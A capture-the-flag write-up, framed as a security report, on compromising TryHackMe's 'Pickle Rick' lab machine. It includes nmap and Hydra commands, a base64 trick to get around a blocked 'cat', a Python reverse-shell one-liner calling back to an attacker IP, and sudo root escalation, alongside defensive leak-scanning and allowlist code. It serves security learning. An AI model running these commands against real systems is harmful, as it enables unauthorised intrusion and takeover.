# Technical Report

## <mark style="color:purple;">Technical Security Report: "Pickle Rick" System</mark>

### <mark style="color:purple;">Purpose of the Report</mark>

This report documents a simulated security assessment conducted on the "Pickle Rick" system from TryHackMe. The objective was to identify and exploit vulnerabilities, demonstrate potential attack paths, and highlight key areas for security improvement.

***

### <mark style="color:purple;">Methodology</mark>

The assessment was executed using a structured approach:

1. **Reconnaissance:** Identifying open ports and services via Nmap.
2. **Enumeration:** Analyzing web pages and source code to gather user credentials and hidden information.
3. **Exploitation:** Leveraging brute-force techniques, directory enumeration, and command execution to gain further access.
4. **Privilege Escalation:** Establishing a reverse shell and escalating privileges to achieve root access.

***

### <mark style="color:purple;">Detailed Findings</mark>

#### 1. Initial Reconnaissance

* **Tool Used:** Nmap
* **Command Executed:**

  ```bash
  sudo nmap -F -T5 -sCV <target_ip>
  ```
* **Results:** Two open ports were identified:
  * **Port 80:** HTTP service.
  * **Port 22:** SSH service.
* **Impact:** The discovery of these ports set the foundation for further targeted testing.

#### 2. Web Service Analysis

* **Procedure:**
  * Visited `http://<target_ip>:80`, revealing a message from Rick requesting help due to a forgotten password.
  * Examined the page source (via Ctrl+U or using `curl http://<target_ip>`), which exposed the username **R1ckRul3s**.
* **Impact:** The extraction of the username provided a critical credential for subsequent authentication attempts.

#### 3. SSH Brute-Force Attempt

* **Tool Used:** Hydra
* **Command Executed:**

  ```bash
  hydra -l R1ckRul3s -P /usr/share/wordlists/rockyou.txt ssh://<target_ip>
  ```
* **Results:** The SSH service did not support password authentication.
* **Impact:** This method was abandoned in favor of web-based enumeration.

#### 4. Directory Enumeration and Admin Login

* **Tool Used:** DirBuster
* **Procedure:**
  * Ran Dirbuster to enumerate directories on the HTTP service.
  * Discovered that accessing `/portal.php` redirected to `login.php`, an administrative login page.
* **Authentication Attempts:**
  * Tried common passwords (e.g., Password123, admin, root) with no success.
  * Reviewed the `robots.txt` file, which revealed a potential password.
  * **Result:** The discovered password allowed successful login to the admin panel.
* **Impact:** Gaining access to the admin interface provided an in-browser terminal for command execution.
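The two leaks above (a username in the HTML source, a password in `robots.txt`) are the kind of thing a site owner can scan for before an attacker does. The script below is an added example, not part of the original assessment; the regexes and the sample page and `robots.txt` are constructed stand-ins for the real content.

```python
import re
from html.parser import HTMLParser

# Words that usually mean a credential is being discussed, wherever they appear.
CREDENTIAL_HINTS = re.compile(r"user(name)?|pass(word|wd)?|login|secret|token|api[_-]?key", re.I)
# Lines a robots.txt is supposed to contain.
ROBOTS_DIRECTIVE = re.compile(r"(user-agent|allow|disallow|sitemap|crawl-delay)\s*:", re.I)


class _CommentCollector(HTMLParser):
    """Collects <!-- ... --> comments; rendered text is ignored."""

    def __init__(self):
        super().__init__()
        self.comments = []

    def handle_comment(self, data):
        self.comments.append(data.strip())


def find_comment_leaks(page):
    """Return HTML comments that mention credentials (what Ctrl+U / curl exposed)."""
    parser = _CommentCollector()
    parser.feed(page)
    return [c for c in parser.comments if CREDENTIAL_HINTS.search(c)]


def find_robots_leaks(robots_txt):
    """Return robots.txt lines that are not crawler directives: bare values
    (a password dropped there) and comments that mention credentials."""
    leaks = []
    for line in robots_txt.splitlines():
        stripped = line.strip()
        if not stripped or ROBOTS_DIRECTIVE.match(stripped):
            continue
        if stripped.startswith("#") and not CREDENTIAL_HINTS.search(stripped):
            continue  # an ordinary comment
        leaks.append(stripped)
    return leaks


# Constructed samples standing in for the fetched page and robots.txt.
SAMPLE_HTML = """<html><body><h1>Help Rick</h1>
<!-- Note to self, remember username! Username: demo_user -->
<p>I forgot my password.</p></body></html>"""
SAMPLE_ROBOTS = "User-agent: *\nDisallow: /admin\n# nothing here\nN0tAR3alP@ss\n"

if __name__ == "__main__":
    print("HTML comments:", find_comment_leaks(SAMPLE_HTML))
    print("robots.txt:", find_robots_leaks(SAMPLE_ROBOTS))
```

Run it against `curl` output of the site's pages and `/robots.txt`; any line it returns is something a visitor can read without authenticating.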

#### 5. Command Execution and File Discovery

* **Procedure:**
  * Executed commands (`whoami`, `ls -la`) via the admin terminal.
  * Identified a file named `Sup3rS3cretPickl3Ingred.txt`.
  * The `cat` command was blocked; instead, the file was read using:

    ```bash
    base64 "Sup3rS3cretPickl3Ingred.txt" | base64 --decode
    ```
* **Results:** Successfully retrieved the contents (first secret ingredient).
* **Impact:** Obtaining the first ingredient validated the ability to execute system commands.
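The `cat` block illustrates why a denylist is not a command restriction: any other program that reads the file passes. As an added example (not code from the assessed system), the first function mirrors the observed behaviour and the second shows the allowlist-and-argv approach that would have held; the permitted programs and arguments are assumed.

```python
import shlex
import subprocess

# Denylist, as the assessed terminal behaved: "cat" is refused, but any other
# program that reads the same file (base64, less, tail, ...) goes straight through.
BLOCKED = {"cat"}


def denylist_allows(cmdline):
    """Mirror of the weak check: only the first word is compared."""
    words = shlex.split(cmdline)
    return bool(words) and words[0] not in BLOCKED


# Allowlist: named programs with a fixed set of permitted arguments, executed
# without a shell so pipes, redirects and ";" never reach an interpreter.
ALLOWED = {
    "whoami": set(),
    "ls": {"-l", "-a", "-la"},
}


def allowlist_validate(cmdline):
    """Return the argv to execute, or None when the request is rejected."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED:
        return None
    if any(arg not in ALLOWED[argv[0]] for arg in argv[1:]):
        return None
    return argv


def run_allowed(cmdline, timeout=5):
    """Execute an allowlisted request; None means it was rejected, not run."""
    argv = allowlist_validate(cmdline)
    if argv is None:
        return None
    done = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    return done.stdout


if __name__ == "__main__":
    for req in ("cat secret.txt", "base64 secret.txt | base64 --decode", "ls -la; whoami"):
        print(f"{req!r}: denylist={denylist_allows(req)} allowlist={allowlist_validate(req)}")
```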

#### 6. Establishing a Reverse Shell

* **Preparation:**
  * Verified Python 3 availability with `python3 --version`.
  * Employed the reverse shell script from Pentestmonkey.
* **Commands Executed:**
  * **On the Attacker Machine:**

    ```bash
    nc -lnvp 8888
    ```
  * **On the Target (via the admin terminal):**

    ```bash
    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<our_ip>",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
    ```
* **Result:** An interactive reverse shell was established.
* **Impact:** The reverse shell provided a robust foothold, facilitating deeper system exploration.

#### 7. Privilege Escalation to Root

* **Procedure:**
  * Tested for sudo access by executing:

    ```bash
    sudo /bin/bash
    ```
* **Result:** Obtained root-level access.
* **Impact:** Full system control was achieved, allowing unrestricted enumeration and file access.

#### 8. Final Enumeration and Retrieval of Remaining Ingredients

* **Procedure:**
  * Enumerated the root home directory to locate additional secret ingredients.
  * Read the file `3rd.txt` to retrieve another ingredient.
  * Inspected `/home` to identify the `rick` user's directory, which contained the final secret ingredient.
* **Impact:** All required ingredients were successfully retrieved, completing the challenge.

***

### <mark style="color:purple;">Conclusion</mark>

The assessment of the "Pickle Rick" system showcased a methodical exploitation process—from initial reconnaissance and web-based enumeration to reverse shell establishment and privilege escalation. The successful extraction of all secret ingredients highlights vulnerabilities such as exposed administrative interfaces, weak authentication, and inadequate command restrictions. This exercise underscores the importance of robust service configurations, strong authentication practices, and continuous security monitoring to mitigate potential risks.
